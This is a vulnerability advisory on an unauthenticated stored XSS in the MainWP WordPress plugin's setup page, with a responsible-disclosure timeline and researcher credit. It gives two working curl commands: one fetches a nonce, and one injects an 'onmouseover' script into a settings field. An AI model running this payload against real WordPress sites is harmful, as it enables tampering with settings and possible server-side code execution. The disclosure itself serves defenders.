After installing MainWP the plugin presents a quick setup panel which asks the administrator to select and enter some configuration options. When requested in a certain way, the quick setup page doesn’t require login and anyone can alter the settings.
Proof of concept: first, a nonce can be retrieved with the following UNIX command:
curl 'http://WEBSITE/wp-admin/admin-post.php?page=mainwp-setup&step=installation' | grep _wpnonce
curl -F 'mwp_setup_purchase_username=aaa" onmouseover=alert(/xss/);//' -F mwp_setup_purchase_passwd=bbb -F save_step=1 'http://WEBSITE/wp-admin/admin-post.php?page=mainwp-setup&step=purchase_extension&_wpnonce=NONCE_FROM_PREVIOUS_COMMAND'
The script is stored in the WordPress options database. When any administrator next views the MainWP Extensions setting panel, the script will be executed, showing an alert box.
As with other WordPress XSS’s, the impact of this bug is normally server-side code execution because the script can e.g. use AJAX requests to access the theme and plugin editors.
MainWP was notified on April 18. The latest MainWP update addresses this vulnerability. A bug bounty of $50 was awarded.
The vulnerability was discovered and researched by Jouko Pynnönen of Klikki Oy, Finland.